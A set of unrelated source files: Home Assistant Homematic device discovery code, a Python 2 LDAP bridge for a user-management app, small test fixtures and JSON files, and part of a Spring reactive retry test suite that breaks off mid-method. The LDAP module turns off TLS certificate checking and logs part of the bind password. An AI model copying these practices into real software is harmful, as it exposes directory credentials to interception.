# Get list of all keys of the devices (ignoring channels)
key_dict = {}
for dev in dev_descriptions:
key_dict[dev['ADDRESS'].split(':')[0]] = True
##
# remove device they allready init by HA
tmp_devs = key_dict.copy()
for dev in tmp_devs:
if dev in hass.data[DATA_STORE]:
del key_dict[dev]
else:
hass.data[DATA_STORE].append(dev)
# Register EVENTS
# Search all device with a EVENTNODE that include data
bound_event_callback = partial(_hm_event_handler, hass, proxy)
for dev in key_dict:
hmdevice = hass.data[DATA_HOMEMATIC].devices[proxy].get(dev)
# have events?
if len(hmdevice.EVENTNODE) > 0:
_LOGGER.debug("Register Events from %s", dev)
hmdevice.setEventCallback(callback=bound_event_callback,
bequeath=True)
# If configuration allows autodetection of devices,
# all devices not configured are added.
if key_dict:
for component_name, discovery_type in (
('switch', DISCOVER_SWITCHES),
('light', DISCOVER_LIGHTS),
('cover', DISCOVER_COVER),
('binary_sensor', DISCOVER_BINARY_SENSORS),
('sensor', DISCOVER_SENSORS),
('climate', DISCOVER_CLIMATE)):
# Get all devices of a specific type
found_devices = _get_devices(
hass, discovery_type, key_dict, proxy)
# When devices of this type are found
# they are setup in HA and an event is fired
if found_devices:
# Fire discovery event
discovery.load_platform(hass, component_name, DOMAIN, {
ATTR_DISCOVER_DEVICES: found_devices
}, config)
def _get_devices(hass, discovery_type, keys, proxy):
"""Get the Homematic devices for given discovery_type."""
device_arr = []
for key in keys:
device = hass.data[DATA_HOMEMATIC].devices[proxy][key]
class_name = device.__class__.__name__
metadata = {}
# Class supported by discovery type
if class_name not in HM_DEVICE_TYPES[discovery_type]:
continue
# Load metadata if needed to generate a param list
if discovery_type == DISCOVER_SENSORS:
metadata.update(device.SENSORNODE)
elif discovery_type == DISCOVER_BINARY_SENSORS:
metadata.update(device.BINARYNODE)
else:
metadata.update({None: device.ELEMENT})
if metadata:
# Generate options for 1...n elements with 1...n params
for param, channels in metadata.items():
if param in HM_IGNORE_DISCOVERY_NODE:
continue
# Add devices
_LOGGER.debug("%s: Handling %s: %s: %s",
discovery_type, key, param, channels)
for channel in channels:
name = _create_ha_name(
name=device.NAME, channel=channel, param=param,
count=len(channels)
)
device_dict = {
CONF_PLATFORM: "homematic",
ATTR_ADDRESS: key,
ATTR_PROXY: proxy,
ATTR_NAME: name,
ATTR_CHANNEL: channel
}
if param is not None:
device_dict[ATTR_PARAM] = param
# Add new device
try:
DEVICE_SCHEMA(device_dict)
device_arr.append(device_dict)
except vol.MultipleInvalid as err:
_LOGGER.error("Invalid device config: %s",
str(err))
else:
_LOGGER.debug("Got no params for %s", key)
_LOGGER.debug("%s autodiscovery done: %s", discovery_type, str(device_arr))
return device_arr
def _create_ha_name(name, channel, param, count):
"""Generate a unique object name."""
# HMDevice is a simple device
if count == 1 and param is None:
return name
# Has multiple elements/channels
if count > 1 and param is None:
return "{} {}".format(name, channel)
# With multiple param first elements
if count == 1 and param is not None:
return "{} {}".format(name, param)
# Multiple param on object with multiple elements
if count > 1 and param is not None:
return "{} {} {}".format(name, channel, param)
def _hm_event_handler(hass, proxy, device, caller, attribute, value):
"""Handle all pyhomematic device events."""
try:
channel = int(device.split(":")[1])
address = device.split(":")[0]
hmdevice = hass.data[DATA_HOMEMATIC].devices[proxy].get(address)
except (TypeError, ValueError):
_LOGGER.error("Event handling channel convert error!")
return
# is not a event?
if attribute not in hmdevice.EVENTNODE:
return
_LOGGER.debug("Event %s for %s channel %i", attribute,
hmdevice.NAME, channel)
# keypress event
if attribute in HM_PRESS_EVENTS:
hass.add_job(hass.bus.async_fire(EVENT_KEYPRESS, {
ATTR_NAME: hmdevice.NAME,
ATTR_PARAM: attribute,
ATTR_CHANNEL: channel
}))
return
# impulse event
if attribute in HM_IMPULSE_EVENTS:
hass.add_job(hass.bus.async_fire(EVENT_KEYPRESS, {
ATTR_NAME: hmdevice.NAME,
ATTR_CHANNEL: channel
}))
return
_LOGGER.warning("Event is unknown and not forwarded to HA")
def _device_from_servicecall(hass, service):
"""Extract homematic device from service call."""
address = service.data.get(ATTR_ADDRESS)
proxy = service.data.get(ATTR_PROXY)
if proxy:
return hass.data[DATA_HOMEMATIC].devices[proxy].get(address)
for _, devices in hass.data[DATA_HOMEMATIC].devices.items():
if address in devices:
return devices[address]
class HMHub(Entity):
"""The Homematic hub. I.e. CCU2/HomeGear."""
def __init__(self, hass, name, use_variables):
"""Initialize Homematic hub."""
self.hass = hass
self.entity_id = "{}.{}".format(DOMAIN, name.lower())
self._homematic = hass.data[DATA_HOMEMATIC]
self._variables = {}
self._name = name
self._state = STATE_UNKNOWN
self._use_variables = use_variables
# load data
track_time_interval(hass, self._update_hub, SCAN_INTERVAL_HUB)
self._update_hub(None)
if self._use_variables:
track_time_interval(
hass, self._update_variables, SCAN_INTERVAL_VARIABLES)
self._update_variables(None)
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def should_poll(self):
"""Return false. Homematic Hub object update variable."""
return False
@property
def state(self):
"""Return the state of the entity."""
return self._state
@property
def state_attributes(self):
"""Return the state attributes."""
attr = self._variables.copy()
return attr
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
return "mdi:gradient"
def _update_hub(self, now):
"""Retrieve latest state."""
state = self._homematic.getServiceMessages(self._name)
self._state = STATE_UNKNOWN if state is None else len(state)
self.schedule_update_ha_state()
def _update_variables(self, now):
"""Retrive all variable data and update hmvariable states."""
variables = self._homematic.getAllSystemVariables(self._name)
if variables is None:
return
state_change = False
for key, value in variables.items():
if key in self._variables and value == self._variables[key]:
continue
state_change = True
self._variables.update({key: value})
if state_change:
self.schedule_update_ha_state()
def hm_set_variable(self, name, value):
"""Set variable on homematic controller."""
if name not in self._variables:
_LOGGER.error("Variable %s not found on %s", name, self.name)
return
old_value = self._variables.get(name)
if isinstance(old_value, bool):
value = cv.boolean(value)
else:
value = float(value)
self._homematic.setSystemVariable(self.name, name, value)
self._variables.update({name: value})
self.schedule_update_ha_state()
class HMDevice(Entity):
"""The Homematic device base object."""
def __init__(self, hass, config):
"""Initialize a generic Homematic device."""
self.hass = hass
self._homematic = hass.data[DATA_HOMEMATIC]
self._name = config.get(ATTR_NAME)
self._address = config.get(ATTR_ADDRESS)
self._proxy = config.get(ATTR_PROXY)
self._channel = config.get(ATTR_CHANNEL)
self._state = config.get(ATTR_PARAM)
self._data = {}
self._hmdevice = None
self._connected = False
self._available = False
# Set param to uppercase
if self._state:
self._state = self._state.upper()
@property
def should_poll(self):
"""Return false. Homematic states are pushed by the XML RPC Server."""
return False
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def assumed_state(self):
"""Return true if unable to access real state of the device."""
return not self._available
@property
def available(self):
"""Return true if device is available."""
return self._available
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
attr = {}
# no data available to create
if not self.available:
return attr
# Generate an attributes list
for node, data in HM_ATTRIBUTE_SUPPORT.items():
# Is an attributes and exists for this object
if node in self._data:
value = data[1].get(self._data[node], self._data[node])
attr[data[0]] = value
# static attributes
attr['id'] = self._hmdevice.ADDRESS
attr['proxy'] = self._proxy
return attr
def link_homematic(self):
"""Connect to Homematic."""
# device is already linked
if self._connected:
return True
# Init
self._hmdevice = self._homematic.devices[self._proxy][self._address]
self._connected = True
# Check if Homematic class is okay for HA class
_LOGGER.info("Start linking %s to %s", self._address, self._name)
try:
# Init datapoints of this object
self._init_data()
if self.hass.data[DATA_DELAY]:
# We delay / pause loading of data to avoid overloading
# of CCU / Homegear when doing auto detection
time.sleep(self.hass.data[DATA_DELAY])
self._load_data_from_hm()
_LOGGER.debug("%s datastruct: %s", self._name, str(self._data))
# Link events from pyhomatic
self._subscribe_homematic_events()
self._available = not self._hmdevice.UNREACH
_LOGGER.debug("%s linking done", self._name)
# pylint: disable=broad-except
except Exception as err:
self._connected = False
_LOGGER.error("Exception while linking %s: %s",
self._address, str(err))
def _hm_event_callback(self, device, caller, attribute, value):
"""Handle all pyhomematic device events."""
_LOGGER.debug("%s received event '%s' value: %s", self._name,
attribute, value)
have_change = False
# Is data needed for this instance?
if attribute in self._data:
# Did data change?
if self._data[attribute] != value:
self._data[attribute] = value
have_change = True
# If available it has changed
if attribute == 'UNREACH':
self._available = bool(value)
have_change = True
# If it has changed data point, update HA
if have_change:
_LOGGER.debug("%s update_ha_state after '%s'", self._name,
attribute)
self.schedule_update_ha_state()
def _subscribe_homematic_events(self):
"""Subscribe all required events to handle job."""
channels_to_sub = {0: True} # add channel 0 for UNREACH
# Push data to channels_to_sub from hmdevice metadata
for metadata in (self._hmdevice.SENSORNODE, self._hmdevice.BINARYNODE,
self._hmdevice.ATTRIBUTENODE,
self._hmdevice.WRITENODE, self._hmdevice.EVENTNODE,
self._hmdevice.ACTIONNODE):
for node, channels in metadata.items():
# Data is needed for this instance
if node in self._data:
# chan is current channel
if len(channels) == 1:
channel = channels[0]
else:
channel = self._channel
# Prepare for subscription
try:
if int(channel) >= 0:
channels_to_sub.update({int(channel): True})
except (ValueError, TypeError):
_LOGGER.error("Invalid channel in metadata from %s",
self._name)
# Set callbacks
for channel in channels_to_sub:
_LOGGER.debug(
"Subscribe channel %d from %s", channel, self._name)
self._hmdevice.setEventCallback(
callback=self._hm_event_callback, bequeath=False,
channel=channel)
def _load_data_from_hm(self):
"""Load first value from pyhomematic."""
if not self._connected:
return False
# Read data from pyhomematic
for metadata, funct in (
(self._hmdevice.ATTRIBUTENODE,
self._hmdevice.getAttributeData),
(self._hmdevice.WRITENODE, self._hmdevice.getWriteData),
(self._hmdevice.SENSORNODE, self._hmdevice.getSensorData),
(self._hmdevice.BINARYNODE, self._hmdevice.getBinaryData)):
for node in metadata:
if metadata[node] and node in self._data:
self._data[node] = funct(name=node, channel=self._channel)
return True
def _hm_set_state(self, value):
"""Set data to main datapoint."""
if self._state in self._data:
self._data[self._state] = value
def _hm_get_state(self):
"""Get data from main datapoint."""
if self._state in self._data:
return self._data[self._state]
return None
def _init_data(self):
"""Generate a data dict (self._data) from the Homematic metadata."""
# Add all attributes to data dict
for data_note in self._hmdevice.ATTRIBUTENODE:
self._data.update({data_note: STATE_UNKNOWN})
# init device specified data
self._init_data_struct()
def _init_data_struct(self):
"""Generate a data dict from the Homematic device metadata."""
raise NotImplementedError | unknown | codeparrot/codeparrot-clean | ||
//// [tests/cases/conformance/internalModules/moduleDeclarations/asiPreventsParsingAsNamespace04.ts] ////
//// [asiPreventsParsingAsNamespace04.ts]
let module = 10;
module in {}
//// [asiPreventsParsingAsNamespace04.js]
"use strict";
let module = 10;
module in {}; | javascript | github | https://github.com/microsoft/TypeScript | tests/baselines/reference/asiPreventsParsingAsNamespace04.js |
{
"name": "big-module-with-flag",
"sideEffects": false
} | json | github | https://github.com/webpack/webpack | examples/side-effects/node_modules/big-module-with-flag/package.json |
{
"private": true,
"scripts": {
"dev": "next dev",
"build": "next build",
"start": "next start"
},
"dependencies": {
"next": "latest",
"next-translate": "2.5.3",
"react": "18.2.0",
"react-dom": "18.2.0"
},
"devDependencies": {
"next-translate-plugin": "2.5.3"
}
} | json | github | https://github.com/vercel/next.js | examples/with-next-translate/package.json |
{
"type": "function",
"name": "method",
"class": "Symfony\\Bundle\\FrameworkBundle\\Tests\\Console\\Descriptor\\CallableClass"
} | json | github | https://github.com/symfony/symfony | src/Symfony/Bundle/FrameworkBundle/Tests/Fixtures/Descriptor/callable_3.json |
#encoding=utf8
from django.db import models
from django.conf import settings
from django.utils.dateformat import format
from django.core.exceptions import ObjectDoesNotExist
import logging, json, time, copy
import ldap
from ldap import modlist
from datetime import datetime
from pprint import pprint as pp
from fum.common.util import to_json, ldap_log
log = logging.getLogger(__name__)
TOTAL_CONNECTIONS = 0
from ldappool import ConnectionManager
cm = ConnectionManager(
uri=settings.LDAP_CONNECTION.get('uri'),
use_tls=settings.USE_TLS,
)
def open_ldap(bind_dn=None, bind_pwd=None):
return LDAPBridge(parent=None, BIND_DN=bind_dn, BIND_PASSWORD=bind_pwd)
def fetch(self, dn, filters='', attrs=[], scope=ldap.SCOPE_BASE, connection=None):
specials = []
normals = []
for a in attrs:
if isinstance(a, tuple):
specials.append(a)
else:
normals.append(a)
result = connection.search_s(dn, scope, filters, normals)[0][1]
for s in specials:
res = connection.search_s('cn=%s,%s'%(result['cn'],s[0]), scope, filters, [s[1]])
if len(res) > 0:
result[s[1]] = res[0][1][s[1]+"s"]
else:
result[s[1]] = []
return result
def test_user_ldap(username, password):
'''
Test that user has access to ldap with given credentials.
Returns true or false
'''
from fum.models import Users
if username and password:
user = Users.objects.get(username=username)
try:
# throws an exception if the password is incorrect
LDAPBridge(parent=user, BIND_DN=user.get_dn(),
BIND_PASSWORD=password).connection
return True
except Exception, e:
print "ERROR#helpers: %s, %s"%(username,e)
return False
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
class LDAPBridge(object):
""" In LDAP there are Users, Groups, Servers, Projects. Users can be part of the others as uniqueMember MultiValueFields. """
def __init__(self, parent, dn=None, **kwargs):
"""
The class is instantiated with the parent object (DN) that we want to work against in LDAP
"""
self._connection = None
self._connection_bound = False
self.settings = AttrDict()
self.settings.uri = kwargs.get('uri', settings.LDAP_CONNECTION.get('uri'))
self.settings.START_TLS = True
self.settings.CONNECTION_OPTIONS = kwargs.get('LDAP_CONNECTION_OPTIONS', None) or settings.LDAP_CONNECTION_OPTIONS
self.settings.BIND_DN = kwargs.get('BIND_DN', None) or settings.LDAP_CONNECTION.get('bind_dn')
self.settings.BIND_PASSWORD = kwargs.get('BIND_PASSWORD', None) or settings.LDAP_CONNECTION.get('bind_pwd')
self.ldap = ldap
self.parent_instance = parent
self.dn = None
self.creating = False
if self.parent_instance:
self.creating = False if self.parent_instance.pk else True
self.dn = self.parent_instance.get_dn()
def fetch(self, dn, filters='(objectClass=*)', attrs=None, scope=ldap.SCOPE_BASE):
result = self.op_search(dn, scope, filters, attrs)
if scope == ldap.SCOPE_BASE:
return result[0][1]
return result
#
# LDAP connection
#
def _bind(self):
self._bind_as(self.settings.BIND_DN,
self.settings.BIND_PASSWORD,
sticky=True)
def _bind_as(self, bind_dn, bind_password, sticky=False, retry_number=0):
try:
self._get_connection().simple_bind_s(bind_dn.encode('utf-8'), bind_password.encode('utf-8'))
except ldap.SERVER_DOWN, e:
if retry_number == 0:
self._connection = None
return self._bind_as(bind_dn=bind_dn, bind_password=bind_password, sticky=sticky, retry_number=1)
self._connection_bound = sticky
def _get_connection(self):
global TOTAL_CONNECTIONS
if self._connection is None:
TOTAL_CONNECTIONS += 1
log.debug("Opening LDAP connection (%s) [%s/%s] :: %s"%(self.settings.uri,
self.settings.BIND_DN,
self.settings.BIND_PASSWORD[:2]+'****',
TOTAL_CONNECTIONS))
self._connection = self.ldap.initialize(
uri=self.settings.uri,
trace_level=settings.LDAP_TRACE_LEVEL)
for opt, value in self.settings.CONNECTION_OPTIONS.iteritems():
self._connection.set_option(opt, value)
if self.settings.START_TLS:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, 0)
self._connection = self.ldap.initialize(self.settings.uri, trace_level=settings.LDAP_TRACE_LEVEL)
self._connection.start_tls_s()
return self._connection
def _get_bound_connection(self):
if not self._connection_bound:
self._bind()
return self._get_connection()
connection = property(_get_bound_connection)
def get_modify_modlist(self, values, force_update=False):
""" Empty values are not seen as changes due comparing to {};
when (empty key values) found, manually added as changed"""
current_values = {}
mlist = modlist.modifyModlist(current_values, values)
mlist_keys = [k[1] for k in mlist]
for k, m in enumerate(values.keys()):
if m not in mlist_keys:
mlist.append((ldap.MOD_REPLACE, m, None))
for k, m in enumerate(mlist):
mlist[k] = (ldap.MOD_REPLACE, mlist[k][1], mlist[k][2])
return mlist
def get_add_modlist(self, values):
return modlist.addModlist(values)
def needs_saving(self, modified_values={}):
return (self.creating or len(modified_values) > 0)
#
# LDAP operations abstraction
#
#
def op_add(self, dn, mlist):
self.connection.add_s(dn, mlist)
def op_modify(self, dn, mlist):
self.connection.modify_s(dn, mlist)
def op_modify_ext(self, dn, mlist):
self.connection.modify_ext_s(dn, mlist)
def op_delete(self, dn):
return self.connection.delete_s(dn)
def op_search(self, dn, scope, filters, attrs):
return self.connection.search_s(dn, scope, filters, attrs)
#
#
#
#
def create(self, dn=None, values={}, extra={}):
modified_values = self.model_fields_to_ldap_fields(values, extra, mode='create')
mlist = self.get_add_modlist(modified_values)
if not self.needs_saving(modified_values):
log.debug("LDAP: No create required: %s"%self.dn)
return
log.debug("LDAP.create %s :: %s"%(self.dn, ldap_log(mlist)))
# TODO: check for duplicates in objectClass
if dn:
create_dn=dn
elif self.dn:
create_dn=dn
else:
raise Exception("No DN specified, unable to save to LDAP.")
self.op_add(create_dn, mlist)
def save(self, values={}, extra={}, **kwargs):
modified_values = self.model_fields_to_ldap_fields(values, extra, mode='save')
self.kwargs = kwargs
force_update = kwargs.get('force_update', False)
mlist = self.get_modify_modlist(modified_values, force_update=force_update)
if not self.needs_saving(modified_values):
log.debug("LDAP: No save required: %s"%self.dn)
return
if mlist:
log.debug("LDAP.save %s :: %s"%(self.dn, ldap_log(mlist)))
self.op_modify(self.dn, mlist)
def delete(self, dn=None):
dn = dn or self.dn
log.debug("LDAP.delete %s"%(dn))
return self.op_delete(dn)
def create_raw(self, dn, mlist):
log.debug("LDAP.create_raw %s"%dn)
self.op_add(dn, mlist)
def save_raw(self, dn, mlist):
log.debug("LDAP.save_raw %s"%dn)
self.op_modify(dn, mlist)
def save_ext_raw(self, dn, mlist):
log.debug("LDAP.save_ext_raw %s"%dn)
self.op_modify_ext(dn, mlist)
#
#
# ManyToMany relations
#
#
def save_relation(self, parent, child, field):
""" a relation, represented as DN, exists or it does not, it is not modified in-place """
dn = field.get_dn(parent, child)
values = self.prepare_related_values(parent, child, field)
mlist = [(ldap.MOD_ADD, field.ldap_field, values)]
log.debug("LDAP.save_relation %s :: %s"%(dn, ldap_log(mlist)))
self.op_modify_ext(dn, mlist)
def delete_relation(self, parent, child, field):
dn = field.get_dn(parent, child)
values = self.prepare_related_values(parent, child, field)
mlist = [(ldap.MOD_DELETE, field.ldap_field, values)]
log.debug("LDAP.delete_relation %s :: %s"%(self.dn, ldap_log(mlist)))
self.op_modify_ext(dn, mlist)
def replace_relation(self, parent, child, field):
dn = field.get_dn(parent, child)
values = self.prepare_related_values(parent, child, field)
mlist = [(ldap.MOD_REPLACE, field.ldap_field, values)]
log.debug("LDAP.replace_relation %s :: %s"%(dn, ldap_log(mlist)))
self.op_modify_ext(dn, mlist)
def prepare_related_values(self, parent, child, field):
""" relations are a represented as MultiValueFields
instance values are returned as get_dn(), but this is true only for User
- need to use ManyFields.get_dn()
"""
if isinstance(child, models.Model):
values = [field.as_value(parent, child)]
elif isinstance(child, basestring):
values = [child.encode('utf-8')]
elif isinstance(child, list):
pass
else:
raise Exception("Values must be a model instance, string or list")
return values
#
#
# OLD vs NEW
#
#
def get_ldap_fields(self):
ldap_fields = copy.deepcopy(self.parent_instance.ldap_fields)
ldap_only_fields = copy.deepcopy(self.parent_instance.ldap_only_fields)
ldap_fields.update(ldap_only_fields)
return ldap_fields
def model_fields_to_ldap_fields(self, values={}, extra={}, mode=''):
a = {}
changes = values
for field, ldap_field in self.get_ldap_fields().iteritems():
attr = getattr(self.parent_instance, field, '')
if callable(attr):
if mode == 'create':
# cn required on create
if changes:
a.update(self.as_ldap_value(field, attr()))
else:
if changes.has_key(field):
a.update(self.as_ldap_value(field, attr()))
else:
if changes.has_key(field):
a.update(self.as_ldap_value(field, changes[field]['new']))
a.update(extra)
return a
def as_ldap_value(self, field, value):
ldap_fields = self.get_ldap_fields()
if isinstance(ldap_fields[field], list):
fields = ldap_fields[field]
else:
fields = [ldap_fields[field]]
ldap_values = {}
for f in fields:
ldap_values[f] = to_ldap_value(value)
return ldap_values
class DummyLdap(LDAPBridge):
def delete(self, *a, **kw):
log.debug("DummyLDAP.delete %s :: %s"%(self.dn, datetime.now()))
def save(self, *a, **kw):
log.debug("DummyLDAP.save %s :: %s"%(self.dn, datetime.now()))
def create(self, *a, **kw):
log.debug("DummyLDAP.create %s :: %s "%(self.dn, datetime.now()))
def save_relation(self, *a, **kw):
log.debug("DummyLDAP.save_relation %s :: %s "%(self.dn, datetime.now()))
def replace_relation(self, *a, **kw):
log.debug("DummyLDAP.replace_relation %s :: %s "%(self.dn, datetime.now()))
def delete_relation(self, *a, **kw):
log.debug("DummyLDAP.delete_relation %s :: %s "%(self.dn, datetime.now()))
def create_raw(self, dn, mlist):
log.debug("DummyLDAP.create_raw %s"%dn)
def save_raw(self, dn, mlist):
log.debug("DummyLDAP.save_raw %s"%dn)
class ReconnectingLDAPBridge(LDAPBridge):
def __init__(self, parent, dn=None, **kwargs):
super(ReconnectingLDAPBridge, self).__init__(parent, dn, **kwargs)
self.ldap_class = ldap.ldapobject.ReconnectLDAPObject
self.ldap_options = dict(
uri=self.settings.uri,
trace_level=settings.LDAP_TRACE_LEVEL,
retry_max=settings.LDAP_RETRY_MAX,
retry_delay=settings.LDAP_RETRY_DELAY,
)
def get_ldap_class(self):
return self.ldap_class(**self.ldap_options)
def _bind_as(self, bind_dn, bind_password, sticky=False, retry_number=0):
try:
self._get_connection().simple_bind_s(bind_dn.encode('utf-8'), bind_password.encode('utf-8'))
except ldap.SERVER_DOWN, e:
if retry_number == 0:
self._connection = None
return self._bind_as(bind_dn=bind_dn, bind_password=bind_password, sticky=sticky, retry_number=1)
self._connection_bound = sticky
def _get_bound_connection(self):
if not self._connection: # _connection_bound irrelevant
self._bind()
return self._get_connection()
def _get_connection(self):
if self._connection is None:
log.debug("Opening LDAP connection (%s)"%(self.settings.uri))
self._connection = self.get_ldap_class()
for opt, value in self.settings.CONNECTION_OPTIONS.iteritems():
self._connection.set_option(opt, value)
if self.settings.START_TLS:
self._connection.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, 0)
self._connection.start_tls_s()
return self._connection
class PoolLDAPBridge(LDAPBridge):
def op_add(self, dn, mlist):
with self.connection as c:
c.add_s(dn, mlist)
def op_modify(self, dn, mlist):
with self.connection as c:
c.modify_s(dn, mlist)
def op_modify_ext(self, dn, mlist):
with self.connection as c:
c.modify_ext_s(dn, mlist)
def op_delete(self, dn):
with self.connection as c:
return c.delete_s(dn)
def op_search(self, dn, scope, filters, attrs):
with self.connection as c:
return c.search_s(dn, scope, filters, attrs)
def _get_bound_connection(self):
return cm.connection(self.settings.BIND_DN, self.settings.BIND_PASSWORD)
connection = property(_get_bound_connection)
def to_ldap_value(attr):
if attr is None:
return ''
elif isinstance(attr, datetime):
return format(attr, 'U').encode('utf8')
elif isinstance(attr, unicode):
return attr.encode('utf8')
elif isinstance(attr, int):
return str(attr)
else:
return attr
def my_import(name):
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
cls_lookup_table = {}
def ldap_cls(*args, **kwargs):
ldap_cls = kwargs.pop('LDAP_CLASS', None) or settings.LDAP_CLASS
if ldap_cls in cls_lookup_table:
cls = cls_lookup_table[ldap_cls]
else:
ldap_cls_modules = ldap_cls.split('.')
m = '.'.join(ldap_cls_modules[:-1])
module = my_import(m)
cls = getattr(module, ldap_cls_modules[-1])
cls_lookup_table[ldap_cls] = cls
return cls(*args, **kwargs) | unknown | codeparrot/codeparrot-clean | ||
/*
* Copyright 2002-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.resilience;
import java.io.IOException;
import java.lang.reflect.Method;
import java.nio.charset.MalformedInputException;
import java.nio.file.AccessDeniedException;
import java.nio.file.FileSystemException;
import java.time.Duration;
import java.util.concurrent.TimeoutException;
import java.util.concurrent.atomic.AtomicInteger;
import org.assertj.core.api.ThrowingConsumer;
import org.junit.jupiter.api.Nested;
import org.junit.jupiter.api.Test;
import reactor.core.Exceptions;
import reactor.core.publisher.Flux;
import reactor.core.publisher.Mono;
import org.springframework.aop.framework.AopProxyUtils;
import org.springframework.aop.framework.ProxyFactory;
import org.springframework.beans.factory.BeanFactory;
import org.springframework.beans.factory.support.RootBeanDefinition;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;
import org.springframework.context.support.GenericApplicationContext;
import org.springframework.resilience.annotation.EnableResilientMethods;
import org.springframework.resilience.annotation.RetryAnnotationBeanPostProcessor;
import org.springframework.resilience.annotation.Retryable;
import org.springframework.resilience.retry.MethodRetrySpec;
import org.springframework.resilience.retry.SimpleRetryInterceptor;
import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.assertThatExceptionOfType;
import static org.assertj.core.api.Assertions.assertThatIllegalStateException;
import static org.assertj.core.api.Assertions.assertThatNoException;
import static org.assertj.core.api.Assertions.assertThatRuntimeException;
/**
* @author Juergen Hoeller
* @author Sam Brannen
* @since 7.0
*/
class ReactiveRetryInterceptorTests {
@Test
void withSimpleInterceptor() {
NonAnnotatedBean target = new NonAnnotatedBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 5, Duration.ofMillis(10))));
NonAnnotatedBean proxy = (NonAnnotatedBean) pf.getProxy();
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("6");
assertThat(target.counter).hasValue(6);
}
@Test
void withPostProcessorForMethod() {
AnnotatedMethodBean proxy = getProxiedAnnotatedMethodBean();
AnnotatedMethodBean target = (AnnotatedMethodBean) AopProxyUtils.getSingletonTarget(proxy);
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("6");
assertThat(target.counter).hasValue(6);
}
@Test
void withPostProcessorForClassWithExactIncludesMatch() {
AnnotatedClassBean proxy = getProxiedAnnotatedClassBean();
AnnotatedClassBean target = (AnnotatedClassBean) AopProxyUtils.getSingletonTarget(proxy);
// Exact includes match: IOException
assertThatRuntimeException()
.isThrownBy(() -> proxy.ioOperation().block())
// Does NOT throw a RetryExhaustedException, because RejectMalformedInputException3Predicate
// rejects a retry if the last exception was a MalformedInputException with message "3".
.satisfies(isReactiveException())
.havingCause()
.isInstanceOf(MalformedInputException.class)
.withMessageContaining("3");
// 3 = 1 initial invocation + 2 retry attempts
// Not 3 retry attempts, because RejectMalformedInputException3Predicate rejects
// a retry if the last exception was a MalformedInputException with message "3".
assertThat(target.counter).hasValue(3);
}
@Test
void withPostProcessorForClassWithSubtypeIncludesMatch() {
AnnotatedClassBean proxy = getProxiedAnnotatedClassBean();
AnnotatedClassBean target = (AnnotatedClassBean) AopProxyUtils.getSingletonTarget(proxy);
// Subtype includes match: FileSystemException
assertThatRuntimeException()
.isThrownBy(() -> proxy.fileSystemOperation().block())
.satisfies(isRetryExhaustedException())
.withCauseInstanceOf(FileSystemException.class);
// 1 initial attempt + 3 retries
assertThat(target.counter).hasValue(4);
}
@Test // gh-35583
void withPostProcessorForClassWithCauseIncludesMatch() {
AnnotatedClassBean proxy = getProxiedAnnotatedClassBean();
AnnotatedClassBean target = (AnnotatedClassBean) AopProxyUtils.getSingletonTarget(proxy);
// Subtype includes match: FileSystemException
assertThatRuntimeException()
.isThrownBy(() -> proxy.fileSystemOperationWithNestedException().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isExactlyInstanceOf(RuntimeException.class)
.withCauseExactlyInstanceOf(FileSystemException.class);
// 1 initial attempt + 3 retries
assertThat(target.counter).hasValue(4);
}
@Test
void withPostProcessorForClassWithExcludesMatch() {
AnnotatedClassBean proxy = getProxiedAnnotatedClassBean();
AnnotatedClassBean target = (AnnotatedClassBean) AopProxyUtils.getSingletonTarget(proxy);
// Exact excludes match: AccessDeniedException
assertThatRuntimeException()
.isThrownBy(() -> proxy.accessOperation().block())
// Does NOT throw a RetryExhaustedException, because no retry is
// performed for an AccessDeniedException.
.satisfies(isReactiveException())
.withCauseInstanceOf(AccessDeniedException.class);
// 1 initial attempt + 0 retries
assertThat(target.counter).hasValue(1);
}
@Test
void withPostProcessorForClassWithIncludesMismatch() {
AnnotatedClassBean proxy = getProxiedAnnotatedClassBean();
AnnotatedClassBean target = (AnnotatedClassBean) AopProxyUtils.getSingletonTarget(proxy);
// No match: ArithmeticException
//
// Does NOT throw a RetryExhaustedException because no retry is performed
// for an ArithmeticException, since it is not an IOException.
// Does NOT throw a ReactiveException because ArithmeticException is a
// RuntimeException, which reactor.core.Exceptions.propagate(Throwable)
// does not wrap.
assertThatExceptionOfType(ArithmeticException.class)
.isThrownBy(() -> proxy.arithmeticOperation().block())
.withMessage("1");
// 1 initial attempt + 0 retries
assertThat(target.counter).hasValue(1);
}
@Test
void withPostProcessorForClassWithMethodLevelOverride() {
AnnotatedClassBean proxy = getProxiedAnnotatedClassBean();
AnnotatedClassBean target = (AnnotatedClassBean) AopProxyUtils.getSingletonTarget(proxy);
// Overridden, local @Retryable declaration
assertThatIllegalStateException()
.isThrownBy(() -> proxy.overrideOperation().blockFirst())
.satisfies(isRetryExhaustedException())
.withCauseInstanceOf(IOException.class);
// 1 initial attempt + 1 retry
assertThat(target.counter).hasValue(2);
}
@Test
void withMethodRetryEventListener() throws Exception {
AnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();
ctx.registerBeanDefinition("bean", new RootBeanDefinition(AnnotatedMethodBean.class));
